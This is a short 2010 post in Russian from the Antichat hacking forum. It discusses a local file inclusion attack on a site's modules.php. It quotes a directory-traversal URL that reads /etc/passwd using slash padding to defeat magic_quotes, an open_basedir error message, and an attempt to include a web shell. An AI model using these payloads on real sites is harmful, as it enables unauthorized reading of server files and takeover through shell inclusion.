14.04.2010, 22:55
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от Ins3t
Во первых - нету такого файла pass, есть файл passwd
Проблема в magic_quotes.
Пример для Unix сервера:
Код:
site.ru/modules.php?name=../../../../../../../etc/passwd//////////////////[..4095..]
4095 - это минимальное количество слешей.
Но подобный способ довольно таки редко получается провести.
Сообщение от hackmon
что делать если такая ошибка
Warning: file_exists() [function.file-exists]: open_basedir restriction in effect. File(modules/../../../../../../../etc/pass\0/copyright.php) is not within the allowed path(s): (/hosting/site.ru/htdocs/) in /hosting/site.ru/htdocs/includes/javascript.php on line 59
адрес такой: site.ru/modules.php?name=../../../../../../../etc/pass
site.ru/modules.php?name= ставлю ссылку на шелл - заплатка стоит
нет смысла инклюдить /etc/passwd - там же написано, что open_basedir врублен.
|
|
|